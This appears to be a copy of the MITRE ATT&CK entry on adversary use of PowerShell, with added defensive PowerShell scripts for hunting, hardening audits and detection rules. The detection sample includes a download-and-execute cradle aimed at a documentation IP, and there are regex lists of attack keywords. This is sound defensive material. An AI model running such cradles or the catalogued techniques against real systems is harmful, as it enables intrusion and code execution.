
T1059.001 PowerShell

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.7 Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet, which can be used to run an executable, and the Invoke-Command cmdlet, which runs a command locally or on a remote computer (by default, connecting to a remote system over PowerShell remoting requires membership in the target's local Administrators or Remote Management Users group).

PowerShell may also be used to download and run executables from the Internet; the downloaded code can be written to disk and executed from there, or loaded and run directly in memory without ever touching disk.

A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.4

PowerShell commands and scripts can also be executed without directly invoking the powershell.exe binary: any .NET process can host the PowerShell engine through the System.Management.Automation assembly, which is exposed through the .NET Framework and the Common Language Infrastructure (CLI).821
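The hunting counterpart to the point above, as an added example that is not part of the ATT&CK page: a process that hosts the PowerShell engine through System.Management.Automation has that DLL (or its native image, System.Management.Automation.ni.dll) in its module list even though powershell.exe never ran. The script below walks running processes and reports any engine host whose image name is not on an allow list. The allow list itself is an assumption to tune per environment (management consoles, SQL Server or Exchange tooling may legitimately host the engine), and the script must run elevated to read the modules of other users' processes.

```powershell
# Added example, not from the ATT&CK page: hunt for processes that have loaded the
# PowerShell engine (System.Management.Automation.dll or its native image
# System.Management.Automation.ni.dll) but are not the expected PowerShell hosts.
# Run elevated; module lists of other users' processes are not readable otherwise.

# Assumed allow list of legitimate engine hosts; extend it for your environment.
$ExpectedHosts = @('powershell', 'pwsh', 'powershell_ise', 'wsmprovhost', 'sdiagnhost')

function Find-UnexpectedPowerShellHosts {
    param([string[]]$AllowList = $ExpectedHosts)

    foreach ($proc in Get-Process) {
        try {
            $engine = $proc.Modules |
                Where-Object { $_.ModuleName -like 'System.Management.Automation*.dll' } |
                Select-Object -First 1
        } catch {
            continue   # access denied (protected process, other user), 32/64-bit mismatch, or process exited
        }
        if ($engine -and ($proc.ProcessName -notin $AllowList)) {
            [pscustomobject]@{
                ProcessId   = $proc.Id
                ProcessName = $proc.ProcessName
                Path        = $proc.Path
                EngineDll   = $engine.FileName
                CommandLine = (Get-CimInstance Win32_Process -Filter "ProcessId = $($proc.Id)").CommandLine
            }
        }
    }
}

Find-UnexpectedPowerShellHosts | Format-Table -AutoSize
```

The logged equivalent of this check is an image-load event (Sysmon Event ID 7) for System.Management.Automation*.dll where the loading image is not one of the expected hosts; the Module Load data component in the Detection table below is the same signal.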

Item Value
ID T1059.001
Sub-technique of T1059 (Command and Scripting Interpreter)
Other sub-techniques T1059.002, T1059.003, T1059.004, T1059.005, T1059.006, T1059.007, T1059.008, T1059.009
Tactics TA0002 (Execution)
Platforms Windows
Version 1.3
Created 09 March 2020
Last Modified 27 March 2023

Procedure Examples

ID Name Description
C0025 2016 Ukraine Electric Power Attack During the 2016 Ukraine Electric Power Attack, Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.204
S0677 AADInternals AADInternals is written and executed via PowerShell.13
S0622 AppleSeed AppleSeed has the ability to execute its payload via PowerShell.132
G0073 APT19 APT19 used PowerShell commands to execute payloads.175
G0007 APT28 APT28 downloads and executes PowerShell scripts and performs PowerShell commands.136137138
G0016 APT29 APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke.116190191192
G0022 APT3 APT3 has used PowerShell on victim systems to download and run payloads after exploitation.215
G0050 APT32 APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.20921050
G0064 APT33 APT33 has utilized PowerShell to download files from the C2 server and run various scripts.211212
G0082 APT38 APT38 has used PowerShell to execute commands and other operational tasks.199
G0087 APT39 APT39 has used PowerShell to execute malicious code.217218
G0096 APT41 APT41 leveraged PowerShell to deploy malware families in victims’ environments.134135
G0143 Aquatic Panda Aquatic Panda has downloaded additional scripts and executed Base64 encoded commands in PowerShell.177
S0129 AutoIt backdoor AutoIt backdoor downloads a PowerShell script that decodes to a typical shellcode loader.93
S0234 Bandook Bandook has used PowerShell loaders as part of execution.120
S0534 Bazar Bazar can execute a PowerShell script received from C2.9596
S1070 Black Basta Black Basta has used PowerShell scripts for discovery and to execute files over the network.565857
S0521 BloodHound BloodHound can use PowerShell to pull Active Directory information from the target environment.12
G0108 Blue Mockingbird Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.226
S0360 BONDUPDATER BONDUPDATER is written in PowerShell.2930
G0060 BRONZE BUTLER BRONZE BUTLER has used PowerShell for execution.233
S1039 Bumblebee Bumblebee can use PowerShell for execution.48
C0018 C0018 During C0018, the threat actors used encoded PowerShell scripts for execution.256255
C0021 C0021 During C0021, the threat actors used obfuscated PowerShell to extract an encoded payload from within an .LNK file.247248
S0674 CharmPower CharmPower can use PowerShell for payload execution and C2 communication.46
G0114 Chimera Chimera has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features.178179
S0660 Clambling The Clambling dropper can use PowerShell to download the malware.82
G0080 Cobalt Group Cobalt Group has used powershell.exe to download and execute scripts.239238237236235234
S0154 Cobalt Strike Cobalt Strike can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.7875 Cobalt Strike can also use PowerSploit and other scripting frameworks to perform execution.74777679
S0126 ComRAT ComRAT has used PowerShell to load itself every time a user logs in to the system. ComRAT can execute PowerShell scripts loaded into memory or from the file system.112113
G0142 Confucius Confucius has used PowerShell to execute malicious files and payloads.225
S0591 ConnectWise ConnectWise can be used to execute PowerShell commands on target machines.18
G0052 CopyKittens CopyKittens has used PowerShell Empire.219
S0488 CrackMapExec CrackMapExec can execute PowerShell commands via WMI.19
S1023 CreepyDrive CreepyDrive can use PowerShell for execution, including the cmdlets Invoke-WebRequest and Invoke-Expression.49
S1024 CreepySnail CreepySnail can use PowerShell for execution, including the cmdlets Invoke-WebRequest and Invoke-Expression.49
S0625 Cuba Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.106
G0079 DarkHydrus DarkHydrus leveraged PowerShell to download and execute additional scripts for execution.98193
G0105 DarkVishnya DarkVishnya used PowerShell to create shellcode loaders.220
S0673 DarkWatchman DarkWatchman can execute PowerShell commands and has used PowerShell to execute a keylogger.131
G0009 Deep Panda Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.176
S0354 Denis Denis has a version written in PowerShell.50
S0695 Donut Donut can generate shellcode outputs that execute via PowerShell.17
S0186 DownPaper DownPaper uses PowerShell for execution.114
G0035 Dragonfly Dragonfly has used PowerShell scripts for execution.213214
G1006 Earth Lusca Earth Lusca has used PowerShell to execute commands.198
S0554 Egregor Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement.62
G1003 Ember Bear Ember Bear has used PowerShell to download and execute malicious code.70
S0367 Emotet Emotet has used PowerShell to retrieve the malicious payload and download additional resources like Mimikatz.3940414243
S0363 Empire Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the Invoke-PSRemoting module.1415
S0512 FatDuke FatDuke has the ability to execute PowerShell scripts.73
S0679 Ferocious Ferocious can use PowerShell scripts for execution.90
G0051 FIN10 FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.17314
G0037 FIN6 FIN6 has used PowerShell to gain access to merchant’s networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.227228229
G0046 FIN7 FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload.71187188
G0061 FIN8 FIN8's malicious spearphishing payloads are executed as PowerShell. FIN8 has also used PowerShell for lateral movement and credential access.240242241
S0381 FlawedAmmyy FlawedAmmyy has used PowerShell to execute commands.121
G0117 Fox Kitten Fox Kitten has used PowerShell scripts to access credential data.156
C0001 Frankenstein During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.252
G0093 GALLIUM GALLIUM used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.206
G0084 Gallmaker Gallmaker used PowerShell to download additional payloads and for execution.140
G0047 Gamaredon Group Gamaredon Group has used obfuscated PowerShell scripts for staging.117
G0115 GOLD SOUTHFIELD GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts.142
G0078 Gorgon Group Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.141
S0417 GRIFFON GRIFFON has used PowerShell to execute the Meterpreter downloader TinyMet.119
G0125 HAFNIUM HAFNIUM has used the Exchange PowerShell cmdlet Set-OabVirtualDirectory to export mailbox data.196197
S0151 HALFBAKED HALFBAKED can execute PowerShell scripts.71
S0037 HAMMERTOSS HAMMERTOSS is known to use PowerShell.52
S0499 Hancitor Hancitor has used PowerShell to execute commands.61
S0170 Helminth One version of Helminth uses a PowerShell script.92
G1001 HEXANE HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.186184185
G0100 Inception Inception has used PowerShell to execute malicious commands and payloads.55195
G0119 Indrik Spider Indrik Spider has used PowerShell Empire for execution of malware.222223
S0389 JCry JCry has used PowerShell to execute payloads.44
S0648 JSS Loader JSS Loader has the ability to download and execute PowerShell scripts.94
S0387 KeyBoy KeyBoy uses PowerShell commands to download and execute payloads.101
S0526 KGH_SPY KGH_SPY can execute PowerShell commands on the victim’s machine.51
G0094 Kimsuky Kimsuky has executed a variety of PowerShell scripts.180182181183
S0250 Koadic Koadic has used PowerShell to establish persistence.16
S0669 KOCTOPUS KOCTOPUS has used PowerShell commands to download additional files.16
S0356 KONNI KONNI used PowerShell to download and execute a specific 64-bit version of the malware.110111
G0032 Lazarus Group Lazarus Group has used PowerShell to execute commands and malicious code.174
G0140 LazyScripter LazyScripter has used PowerShell scripts to execute malicious code.16
G0065 Leviathan Leviathan has used PowerShell for execution.200201202203
S0680 LitePower LitePower can use a PowerShell script to execute commands.90
S0681 Lizar Lizar has used PowerShell scripts.45
S0447 Lokibot Lokibot has used PowerShell commands embedded inside batch scripts.127
S1060 Mafalda Mafalda can execute PowerShell commands on a compromised machine.129
G0059 Magic Hound Magic Hound has used PowerShell for execution and privilege escalation.159160158157161
G0045 menuPass menuPass uses PowerSploit to inject shellcode into PowerShell.165166
S0688 Meteor Meteor can use PowerShell commands to disable the network adapters on victim machines.66
S0553 MoleNet MoleNet can use PowerShell to set persistence.28
G0021 Molerats Molerats used PowerShell implants on target machines.151
S0256 Mosquito Mosquito can launch PowerShell Scripts.64
G0069 MuddyWater MuddyWater has used PowerShell for execution.1481501441496714314714654145
G0129 Mustang Panda Mustang Panda has used malicious PowerShell scripts to enable execution.162163
S0457 Netwalker Netwalker has been written in PowerShell and executed directly in memory, avoiding detection.107108
S0198 NETWIRE The NETWIRE binary has been executed via PowerShell script.63
S0385 njRAT njRAT has executed PowerShell commands via auto-run registry key persistence.102
G0133 Nomadic Octopus Nomadic Octopus has used PowerShell for execution.246
G0049 OilRig OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.29207208
C0022 Operation Dream Job During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.253
C0014 Operation Wocao During Operation Wocao, threat actors used PowerShell on compromised systems.254
S0352 OSX_OCEANLOTUS.D OSX_OCEANLOTUS.D uses PowerShell scripts.100
G0040 Patchwork Patchwork used PowerSploit to download payloads, run a reverse shell, and execute malware on the victim’s machine.16472
S0517 Pillowmint Pillowmint has used a PowerShell script to install a shim database.86
G0033 Poseidon Group The Poseidon Group's Information Gathering Tool (IGT) includes PowerShell components.194
S0150 POSHSPY POSHSPY uses PowerShell to execute various commands, one to execute its payload.37
S1012 PowerLess PowerLess is written in and executed via PowerShell without using powershell.exe.34
S0685 PowerPunch PowerPunch has the ability to execute through PowerShell.117
S0441 PowerShower PowerShower is a backdoor written in PowerShell.55
S0145 POWERSOURCE POWERSOURCE is a PowerShell backdoor.8584
S0194 PowerSploit PowerSploit modules are written in and executed via PowerShell.2122
S0393 PowerStallion PowerStallion uses PowerShell loops to iteratively check for available commands in its OneDrive C2 server.88
S0223 POWERSTATS POWERSTATS uses PowerShell for obfuscation and execution.68676954
S0371 POWERTON POWERTON is written in PowerShell.124
S1046 PowGoop PowGoop has the ability to use PowerShell scripts to execute commands.54
S0184 POWRUNER POWRUNER is written in PowerShell.29
S1058 Prestige Prestige can use PowerShell for payload execution on targeted systems.65
S0613 PS1 PS1 can utilize a PowerShell loader.83
S0196 PUNCHBUGGY PUNCHBUGGY has used PowerShell scripts.97
S0192 Pupy Pupy has a module for loading and executing PowerShell scripts.23
S1032 PyDCrypt PyDCrypt has attempted to execute with PowerShell.31
S0583 Pysa Pysa has used PowerShell scripts to deploy its ransomware.89
S0650 QakBot QakBot can use PowerShell to download and execute payloads.130
S0269 QUADAGENT QUADAGENT uses PowerShell scripts for execution.118
S0241 RATANKBA There is a variant of RATANKBA that uses a PowerShell script instead of the traditional PE form.125126
S0511 RegDuke RegDuke can extract and execute PowerShell scripts from C2 communications.73
S0379 Revenge RAT Revenge RAT uses PowerShell's access to the .NET Reflection.Assembly class to load itself into memory to aid in execution.128
S0496 REvil REvil has used PowerShell to delete volume shadow copies and download files.24252627
S0270 RogueRobin RogueRobin uses a command prompt to run a PowerShell script from Excel.98 To assist in establishing persistence, RogueRobin creates %APPDATA%\OneDrive.bat and saves the following string to it: powershell.exe -WindowStyle Hidden -exec bypass -File "%APPDATA%\OneDrive.ps1".9998
S1018 Saint Bot Saint Bot has used PowerShell for execution.70
G0034 Sandworm Team Sandworm Team has used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.205204
S0053 SeaDuke SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket.116
S0382 ServHelper ServHelper has the ability to execute a PowerShell script to get information from the infected host.32
S0546 SharpStage SharpStage can execute arbitrary commands with PowerShell.28122
S0450 SHARPSTATS SHARPSTATS has the ability to employ a custom PowerShell script.69
G0121 Sidewinder Sidewinder has used PowerShell to drop and execute malware loaders.221
G0091 Silence Silence has used PowerShell to download and execute payloads.243244
S0692 SILENTTRINITY SILENTTRINITY can use PowerShell to execute commands.20
S0649 SMOKEDHAM SMOKEDHAM can execute PowerShell commands sent from its C2 server.38
S0273 Socksbot Socksbot can write and execute PowerShell scripts.72
C0024 SolarWinds Compromise During the SolarWinds Compromise, APT29 used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and execute other commands.249251250
S0390 SQLRat SQLRat has used PowerShell to create a Meterpreter session.91
S1030 Squirrelwaffle Squirrelwaffle has used PowerShell to execute its payload.5960
G0038 Stealth Falcon Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.139
S0491 StrongPity StrongPity can use PowerShell to add files to the Windows Defender exclusions list.33
G0062 TA459 TA459 has used PowerShell for execution of a payload.133
G0092 TA505 TA505 has used PowerShell to download and execute malware and reconnaissance scripts.152153154155
G0139 TeamTNT TeamTNT has executed PowerShell commands in batch scripts.189
G0088 TEMP.Veles TEMP.Veles has used a publicly-available PowerShell-based tool, WMImplant.230 The group has also used PowerShell to perform Timestomping.231
G0027 Threat Group-3390 Threat Group-3390 has used PowerShell for execution.22482
G0076 Thrip Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.216
G0131 Tonto Team Tonto Team has used PowerShell to download additional payloads.245
S0266 TrickBot TrickBot has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers.123
G0010 Turla Turla has used PowerShell to execute commands/scripts, in some cases via a custom executable or code from Empire's PSInject.16788168 Turla has also used PowerShell scripts to load and execute malware in memory.
S0386 Ursnif Ursnif droppers have used PowerShell in download cradles to download and execute the malware’s full executable payload.87
S0476 Valak Valak has used PowerShell to download additional modules.47
S0670 WarzoneRAT WarzoneRAT can use PowerShell to download files and execute commands.3536
S0514 WellMess WellMess can execute PowerShell scripts received from C2.8081
S0689 WhisperGate WhisperGate can use PowerShell to support multiple actions including execution and defense evasion.104103105
G0090 WIRTE WIRTE has used PowerShell for script execution.232
G0102 Wizard Spider Wizard Spider has used macros to execute PowerShell scripts to download malware on victim’s machines.171 It has also used PowerShell to execute commands and move laterally through a victim network.170172169
S1065 Woody RAT Woody RAT can execute PowerShell commands and scripts with the use of a .NET DLL, WoodyPowerSession.109
S0341 Xbash Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.53
S0330 Zeus Panda Zeus Panda uses PowerShell to download and execute the payload.115

Mitigations

ID Mitigation Description
M1049 Antivirus/Antimalware Anti-virus can be used to automatically quarantine suspicious files.
M1045 Code Signing Set the PowerShell execution policy (AllSigned) so that only signed scripts run. Execution policy is a safeguard against accidentally running untrusted scripts, not a security boundary: commands passed on the command line or via -EncodedCommand are not subject to it, and the Bypass switch disables it for that process, so pair it with application control.
M1042 Disable or Remove Feature or Program It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions.
M1038 Execution Prevention Use application control where appropriate. PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., Add-Type).11 Constrained Language mode is applied to PowerShell sessions automatically when Windows Defender Application Control or AppLocker enforces script rules; without such an enforcing policy it is set per session and can be undone by an adversary who controls the session.
M1026 Privileged Account Management When PowerShell is necessary, consider restricting PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.10
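An added example, not part of the ATT&CK page, that audits the controls named in the Mitigations table on the local host and demonstrates Constrained Language mode refusing Add-Type in an isolated runspace. The registry locations are the Group Policy paths under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell; the check for the PowerShell v2 engine (which has no script block logging and is therefore a logging-downgrade target via powershell.exe -Version 2) uses Get-WindowsOptionalFeature and is skipped where the DISM module is not available. The second function hosts the engine through the System.Management.Automation API that the technique description mentions; it must itself be run from a FullLanguage session, since a Constrained Language session cannot create runspaces.

```powershell
# Added example, not from the ATT&CK page: audit the controls the Mitigations table
# names and show Constrained Language mode refusing Add-Type. Registry paths are the
# Group Policy locations under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell.

function Get-PowerShellHardeningState {
    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $enabled = {
        param($SubKey, $Name)
        $v = Get-ItemProperty -Path "$policyRoot\$SubKey" -Name $Name -ErrorAction SilentlyContinue
        ($null -ne $v) -and ($v.$Name -eq 1)
    }

    # The v2 engine has no script block logging, so "powershell -Version 2" is a
    # logging downgrade; report whether the optional feature is still installed.
    $v2State = 'Unknown (DISM module not available)'
    if (Get-Command Get-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
        $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction SilentlyContinue
        if ($v2) { $v2State = $v2.State }
    }

    [pscustomobject]@{
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode
        ExecutionPolicy    = (Get-ExecutionPolicy -List | ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }) -join '; '
        ScriptBlockLogging = & $enabled 'ScriptBlockLogging' 'EnableScriptBlockLogging'
        ModuleLogging      = & $enabled 'ModuleLogging'      'EnableModuleLogging'
        Transcription      = & $enabled 'Transcription'      'EnableTranscripting'
        PowerShellV2Engine = $v2State
    }
}

function Test-ConstrainedLanguageBlocksAddType {
    # Host the engine in a second runspace (the System.Management.Automation API the
    # technique text describes), lower it to ConstrainedLanguage, and try Add-Type.
    # Returns $true when the call is refused.
    $rs = [runspacefactory]::CreateRunspace()
    $rs.Open()
    $rs.SessionStateProxy.LanguageMode = [System.Management.Automation.PSLanguageMode]::ConstrainedLanguage
    $ps = [powershell]::Create()
    $ps.Runspace = $rs
    [void]$ps.AddScript('Add-Type -TypeDefinition "public class Probe { }"')
    try   { $null = $ps.Invoke(); $blocked = $ps.HadErrors }
    catch { $blocked = $true }     # a terminating error from the cmdlet also counts as refused
    $ps.Dispose(); $rs.Dispose()
    return $blocked
}

Get-PowerShellHardeningState | Format-List
"Constrained Language mode blocks Add-Type: $(Test-ConstrainedLanguageBlocksAddType)"
```

A host on which the audit reports LanguageMode=FullLanguage, an ExecutionPolicy of Unrestricted or Bypass at MachinePolicy scope, logging switches off and the v2 engine Enabled has none of the table's controls in effect; on a host with an enforcing WDAC or AppLocker policy the first field reads ConstrainedLanguage without any per-session setting.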

Detection

ID Data Source Data Component
DS0017 Command Command Execution
DS0011 Module Module Load
DS0009 Process Process Creation
DS0012 Script Script Execution
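As an added example that is not from the ATT&CK page, the following is a small rule set for the Command Execution and Script Execution data components, run over constructed sample events. Process-creation events (Security 4688 with command-line auditing enabled, or Sysmon Event ID 1) carry only the command line, so an -EncodedCommand argument has to be decoded before the download cradle inside it is visible; Script Block Logging (PowerShell Operational 4104) already records the decoded script text. The event field names (EventId, Process, Text), the sample command lines and the address 198.51.100.7 are constructed for the example and are not taken from any report cited on this page.

```powershell
# Added example, not from the ATT&CK page: rule logic for the Command Execution and
# Script Execution data components, run over constructed sample events. Field names
# (EventId, Process, Text) are a simplification; map them to 4688 / Sysmon 1 command
# lines and 4104 ScriptBlockText in your own pipeline.

function ConvertFrom-EncodedCommand {
    # Decode an -EncodedCommand argument (base64 of UTF-16LE text). powershell.exe accepts
    # any unambiguous prefix of the switch name, so -e, -ec, -en and -enc all count.
    param([Parameter(Mandatory)][string]$CommandLine)
    $pattern = '(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+["'']?([A-Za-z0-9+/=]{16,})'
    $m = [regex]::Match($CommandLine, $pattern)
    if (-not $m.Success) { return $null }
    try   { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
    catch { $null }   # not valid base64; the raw-text rules still apply
}

# Each rule is one indicator; a single event can match several.
$Rules = @(
    @{ Name = 'EncodedCommand';   Pattern = '(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s' }
    @{ Name = 'HiddenWindow';     Pattern = '(?i)[-/]w(?:indowstyle)?\s+hidden' }
    @{ Name = 'ExecPolicyBypass'; Pattern = '(?i)[-/](?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)' }
    @{ Name = 'NoProfile';        Pattern = '(?i)[-/]nop(?:rofile)?\b' }
    @{ Name = 'DownloadCradle';   Pattern = '(?i)(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|Start-BitsTransfer)' }
    @{ Name = 'InvokeExpression'; Pattern = '(?i)(?:\biex\b|Invoke-Expression)' }
    @{ Name = 'InMemoryLoad';     Pattern = '(?i)(?:FromBase64String|Reflection\.Assembly\]::Load|VirtualAlloc|Invoke-Mimikatz|Invoke-Shellcode)' }
)

function Test-PowerShellEvent {
    param([Parameter(Mandatory)]$Record)
    # 4104 already holds decoded script text; for process-creation events decode the
    # -EncodedCommand payload and scan both the raw command line and the decoded text.
    $texts   = @($Record.Text)
    $decoded = $null
    if ($Record.EventId -ne 4104) {
        $decoded = ConvertFrom-EncodedCommand -CommandLine $Record.Text
        if ($decoded) { $texts += $decoded }
    }
    $hits = foreach ($rule in $Rules) {
        if (@($texts | Where-Object { $_ -match $rule.Pattern }).Count -gt 0) { $rule.Name }
    }
    [pscustomobject]@{
        EventId    = $Record.EventId
        Process    = $Record.Process
        Score      = @($hits).Count
        Indicators = (@($hits) -join ', ')
        Decoded    = $decoded
    }
}

# Constructed sample events; 198.51.100.7 is a documentation address, not a real C2.
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$SampleEvents = @(
    [pscustomobject]@{ EventId = 4688
                       Process = 'powershell.exe'
                       Text    = "powershell.exe -NoP -W Hidden -Exec Bypass -Enc $encoded" }
    [pscustomobject]@{ EventId = 4104
                       Process = 'powershell.exe'
                       Text    = '$b = [Convert]::FromBase64String($s); [Reflection.Assembly]::Load($b)' }
    [pscustomobject]@{ EventId = 4688
                       Process = 'powershell.exe'
                       Text    = 'powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\Nightly-Backup.ps1' }
)

$SampleEvents | ForEach-Object { Test-PowerShellEvent -Record $_ } |
    Sort-Object Score -Descending |
    Format-Table EventId, Score, Indicators, Decoded -AutoSize
```

The first sample only reveals its download cradle after decoding, which is why the rule set scans the decoded payload as well as the raw command line; the scheduled backup in the third sample matches nothing, and in production the score threshold and the allow-listing of known administrative scripts are what keep the rule quiet.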

References


  1. Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019. 

  2. Christensen, L. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018. 

  3. Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016. 

  4. Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016. 

  5. Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021. 

  6. Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. 

  7. Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016. 

  8. Warner, J. (2015, January 6). Inexorable PowerShell – A Red Teamer's Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018. 

  9. Microsoft. (2022, November 17). Just Enough Administration. Retrieved March 27, 2023. 

  10. Sutherland, S. (2014, September 9). 15 Ways to Bypass the PowerShell Execution Policy. Retrieved July 23, 2015. 

  11. PowerShell Team. (2017, November 2). PowerShell Constrained Language Mode. Retrieved March 27, 2023. 

  12. Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020. 

  13. Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 18, 2022. 

  14. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. 

  15. The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019. 

  16. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. 

  17. TheWover. (2019, May 9). donut. Retrieved March 25, 2022. 

  18. Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021. 

  19. byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020. 

  20. Salvati, M. (2019, August 6). SILENTTRINITY Modules. Retrieved March 24, 2022. 

  21. PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018. 

  22. PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018. 

  23. Nicolas Verdier. (n.d.). Retrieved January 29, 2018. 

  24. Secureworks. (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020. 

  25. Cadieux, P., et al. (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020. 

  26. Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020. 

  27. Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020. 

  28. Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020. 

  29. Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. 

  30. Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019. 

  31. Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022. 

  32. Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020. 

  33. Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020. 

  34. Cybereason Nocturnus. (2022, February 1). PowerLess Trojan: Iranian APT Phosphorus Adds New PowerShell Backdoor for Espionage. Retrieved June 1, 2022. 

  35. Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021. 

  36. Mohanta, A. (2020, November 25). Warzone RAT comes with UAC bypass technique. Retrieved April 7, 2022. 

  37. Dunwoody, M. (2017, April 3). Dissecting One of APT29's Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017. 

  38. FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. 

  39. Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019. 

  40. Trend Micro. (2019, January 16). Exploring Emotet's Activities. Retrieved March 25, 2019. 

  41. Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019. 

  42. Donohue, B. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019. 

  43. Lee, S. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019. 

